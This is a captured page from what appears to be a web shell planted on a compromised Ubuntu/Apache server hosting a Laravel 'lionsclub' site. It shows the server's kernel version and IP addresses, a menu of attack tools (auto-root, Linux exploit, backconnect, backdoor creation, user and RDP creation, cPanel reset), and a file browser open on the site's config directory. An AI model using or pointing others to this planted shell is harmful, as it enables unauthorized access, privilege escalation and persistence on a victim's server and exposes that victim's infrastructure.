Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 3.17.9.149
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
lionsclub /
core /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
app.php
9.84
KB
-rw-r--r--
auth.php
3.71
KB
-rw-r--r--
broadcasting.php
1.56
KB
-rw-r--r--
cache.php
3.03
KB
-rw-r--r--
captcha.php
154
B
-rw-r--r--
cors.php
823
B
-rw-r--r--
database.php
5
KB
-rw-r--r--
filesystems.php
2.63
KB
-rw-r--r--
fortify.php
3.04
KB
-rw-r--r--
geoip.php
4.78
KB
-rw-r--r--
hashing.php
1.53
KB
-rw-r--r--
installer.php
4.95
KB
-rw-r--r--
jetstream.php
1.03
KB
-rw-r--r--
logging.php
2.83
KB
-rw-r--r--
mail.php
3.29
KB
-rw-r--r--
queue.php
2.7
KB
-rw-r--r--
sanctum.php
1.59
KB
-rw-r--r--
services.php
2.01
KB
-rw-r--r--
session.php
6.88
KB
-rw-r--r--
translation-manager.php
1.43
KB
-rw-r--r--
view.php
1.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : view.php
<?php return [ /* |-------------------------------------------------------------------------- | View Storage Paths |-------------------------------------------------------------------------- | | Most templating systems load templates from disk. Here you may specify | an array of paths that should be checked for your views. Of course | the usual Laravel view path has already been registered for you. | */ 'paths' => [ resource_path('views'), ], /* |-------------------------------------------------------------------------- | Compiled View Path |-------------------------------------------------------------------------- | | This option determines where all the compiled Blade templates will be | stored for your application. Typically, this is within the storage | directory. However, as usual, you are free to change this value. | */ 'compiled' => env( 'VIEW_COMPILED_PATH', realpath(storage_path('framework/views')) ), ];
Close